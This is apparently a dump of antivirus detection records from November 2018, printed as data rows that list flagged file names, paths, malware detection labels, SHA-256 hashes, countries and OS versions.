  Row(detection=Row(filename='j111.exe', filepath='J111.exe', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T06:52:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052254-526372a1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052254-526372A1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='media.bat', filepath='C:\\Users\\X\\Recorded TV\\Sample Media\\Media.bat', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6bbada565c292d9f92dd7bdf3a9a87ad84ad76ef259c6462ed674488ae9fc572', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:58:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053946-ad7e5531', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053946-AD7E5531', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050323-97fd8751', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050323-97FD8751', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061236-43597cba', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061236-43597CBA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155946-e9899d19', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-155946-E9899D19', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:02:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061906-2bf414c0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061906-2BF414C0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dealplylive.exe', filepath='C:\\Program Files (x86)\\DealPlyLive\\Update\\1.3.23.0\\DealPlyLive.exe', filesize=148000, name='ADWARE/DealPly.Gen4.#M300.#R300171'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='AU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T01:48:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-133750-bb3a2632', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-133750-BB3A2632', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:40:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='méta.exe', filepath='\\?\\D:\\ADATA UFD\\Réussir sa prépa !\\2ème année\\El Khebbache\\AutoPlay\\Docs\\méta.exe', filesize=2264000, name='HEUR/AGEN.1009225.#M1.#R1'), hash='5763da0d33b33408b41b0d2f9051b1ec67294727b6e53f7f4e55fb92b63f2c7a', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:57:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054639-a3836975', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054639-A3836975', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050756-3b0b00d0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050756-3B0B00D0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='6f8bf06b358bc43436486f2c53d19ae8e7ee08a2b9e6b46a7cc201c25534d452', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\6F8BF06B358BC43436486F2C53D19AE8E7EE08A2B9E6B46A7CC201C25534D452', filesize=256000, name='TR/Crypt.XPACK.Gen.#M300.#R544'), hash='6f8bf06b358bc43436486f2c53d19ae8e7ee08a2b9e6b46a7cc201c25534d452', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T09:52:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054535-7d99bb5d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054535-7D99BB5D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-120408-0b458bff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-115910-EAFC0947\\AVSCAN-20181102-120408-0B458BFF', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061638-d3f80621', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061638-D3F80621', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060305-ef6613e3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060305-EF6613E3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061620-c8fa4917', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061620-C8FA4917', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060318-f6bebc58', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060318-F6BEBC58', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060839-b666f5df', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060839-B666F5DF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061147-266daf39', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061147-266DAF39', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051315-f8d1ad88', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051315-F8D1AD88', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052647-dd22c1d3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052647-DD22C1D3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055352-a5bea891', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055352-A5BEA891', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062639-3a1a2c0b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062639-3A1A2C0B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060817-a8fd4e63', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060817-A8FD4E63', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053931-a480e7f5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053931-A480E7F5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054035-ca562727', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054035-CA562727', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051650-7934851d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051650-7934851D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051412-1b2f9404', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051412-1B2F9404', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052607-c53f8429', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052607-C53F8429', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062012-537cf7c1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062012-537CF7C1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061828-156b48c9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061828-156B48C9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052024-f8c7066f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052024-F8C7066F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:20:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052649-de7b4fca', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052649-DE7B4FCA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061841-1d75d79e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061841-1D75D79E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062543-18fccbc9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062543-18FCCBC9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052152-2d490b53', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052152-2D490B53', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062259-b6ff4252', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062259-B6FF4252', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054843-edc2b08e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054843-EDC2B08E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053551-216e110d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053551-216E110D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060740-934b95ef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060740-934B95EF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062334-cbcd6449', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062334-CBCD6449', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:23:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060647-73b2f5bd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060647-73B2F5BD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:06:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055733-296d9446', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055733-296D9446', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054118-e412df39', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054118-E412DF39', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061554-b9aead10', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061554-B9AEAD10', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062416-e4c3f93e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062416-E4C3F93E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053414-e76a052a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053414-E76A052A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055154-5f61bdcc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055154-5F61BDCC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051406-1770e678', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051406-1770E678', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:05Z'), dt=datetime.date(2018, 11, 2)),
